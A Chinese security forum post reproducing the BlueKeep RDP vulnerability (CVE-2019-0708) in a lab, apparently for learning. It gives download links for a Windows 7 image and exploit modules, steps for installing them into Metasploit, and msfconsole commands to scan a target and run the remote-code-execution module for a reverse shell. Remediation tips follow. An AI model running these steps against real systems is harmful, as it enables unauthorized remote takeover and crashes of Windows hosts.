CVE-2019-0708——反弹shell 复现
0x00 前言
卑微的只能来复现漏洞,而且还是经历了emmmmmm的过程才复现出来。
0x01 环境准备
镜像:https://pan.baidu.com/s/1FhZnLtIZbiOHh2mGAdTEDA 提取码:296r
Exp:链接:https://pan.baidu.com/s/13t0EoE6A5CDNOCmU17gFPw 提取码:jggk
一.安装好镜像,选择sp版本,开启远程连接,并允许任意版本远程桌面连接。
二.配置msf,将exp放到对应的msf文件夹下,同名的话直接覆盖。(4.的windows文件夹下没有rdp文件夹的话就新建一个)
1.rdp.rb -> /usr/share/metasploit-framework/lib/msf/core/exploit/rdp.rd
2.rdp_scanner.rb -> /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/rdp_scanner.rb
3.cve_2019_0708_bluekeep.rb -> /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb
4.cve_2019_0708_bluekeep_rce.rb -> /usr/share/metasploit-framework/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb
0x02 漏洞复现
root@kali:~# msfconsole
msf5 > search 0708 //查看0708模块
msf5 > use auxiliary/scanner/rdp/cve_2019_0708_bluekeep //使用Auxiliary 模块扫描验证有没有这个漏洞
msf5 auxiliary(scanner/rdp/cve_2019_0708_bluekeep) > set rhosts 192.168.182.133 //添加攻击ip,然后run,发现有这个漏洞
//攻击部分
msf5 auxiliary(scanner/rdp/cve_2019_0708_bluekeep) > use exploit/windows/rdp/cve_2019_0708_bluekeep_rce //使用攻击模块
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set target 2
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > run
0x03 漏洞修复
- 及时打对应系统的安全补丁。
- 关闭3389端口或添加防火墙安全策略限制对3389端口的访问。
- 打不了补丁的可以开启远程桌面(网络级别身份验证(NLA)),可以临时防止漏洞攻击。
注意:
1.target是主机架构选择的意思,使用show targets可查看相关选项,这里必须要选择正确,否则会导致目标机器蓝屏。这里可以先试试2再试试3。(PS:这里我虽然用的是VMware可是选3会使得目标蓝屏,选2才能反弹shell,反弹shell比较慢至少要十几秒)。
2.我这里用的是windows7 sp1 版本。
打赏我,让我更有动力~
官方通告
安全技术交流区
问题反馈区
面试经验分享
安全动态每天看
公开课学院
正式课学院
工具篇学院
Track实验室
闲聊灌水区
招聘信息发布专区
holic
发表于 1个月前
我的最爱
评论列表
加载数据中...
skghost
发表于 1个月前
今晚,秋名山见。
链接:https://pan.baidu.com/s/1xPtg3leWbpMGEWpqgFUGpg
提取码:act3
复制这段内容后打开百度网盘手机App,操作更方便哦
评论列表
加载数据中...
ctf_leadsec
发表于 22天前
1
评论列表
加载数据中...
ctf_leadsec
发表于 18天前
1
评论列表
加载数据中...